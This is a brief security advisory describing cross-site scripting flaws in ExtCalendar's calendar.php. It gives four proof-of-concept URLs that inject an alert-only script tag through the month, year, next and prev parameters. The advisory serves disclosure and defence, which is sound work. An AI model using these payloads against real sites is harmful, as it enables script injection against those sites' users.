ExtCalendar Cross-Site Scripting Vulnerabilities

ExtCalendar Cross-Site Scripting Vulnerabilities

This issue can be exploited through a web client.

The following proof-of-concept URIs are available:

http://www.example.com/path/calendar.php?op=cal&month=3&year="><script>alert(/Soot/)</script>

http://www.example.com/path/calendar.php?op=cal&month="><script>alert(/Soot/)</script>&year=2006

http://www.example.com/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next="><script>alert(/Soot/)</script>

http://www.example.com/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next=2&prev="><script>alert(/Soot/)</script>